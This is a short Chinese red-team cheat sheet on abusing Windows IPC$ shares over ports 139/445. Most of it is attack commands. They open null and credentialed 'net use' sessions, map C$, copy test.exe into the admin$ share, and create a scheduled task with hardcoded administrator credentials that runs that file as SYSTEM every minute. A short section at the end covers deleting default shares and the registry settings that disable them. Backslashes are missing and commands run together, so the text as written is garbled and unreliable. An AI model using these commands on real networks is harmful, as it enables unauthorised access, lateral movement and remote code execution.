『红蓝对抗』IPC$ 共享的那些事儿

开放了139或445端口目标开启ipc$共享获取用户账号密码

net share       #查看自己的共享net view \127.0.0.1   #查看目标共享资源net use \127.0.0.1ipc$ "" /user:""  #建立空连接net use \127.0.0.1ipc$ "password" /user:"username"  #建立完整连接net use \127.0.0.1ipc$ /del  #删除IPC$连接net use z: \127.0.0.1c$   #直接访问net use c: /del        #删除映射的c盘net use * /del /y      #删除全部连接不提示net use\去连接的IP地址ipc$ "域成员密码"  /user:域名域成员账号dir \momaek.comc$copy test.exe \127.0.0.1admin$ 复制文件至目标服务器的共享目录c盘的Windows目录下copy test.exe \momaek.comc$ net use \192.168.100.1ipc$ /del 删除ipc$连接

schtasks /create /s 192.168.30.136 /u administrator /p QWEqwe123 /tn test /sc minute /mo 1 /tr C:Windowstest.exe /ru system /f

错误号51   #Windows无法找到网络路径：网络有问题；错误号53   #找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；错误号67   #找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$；错误号1792 #试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；错误号2242 #此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。

net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete

禁止C$、D$、E$一类的共享：在HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters新建一个DOWRD值“AutoShareServer”设置为“0”。禁止ADMIN$共享：新建一个DOWRD值“AutoShareWKs”设置为“0”。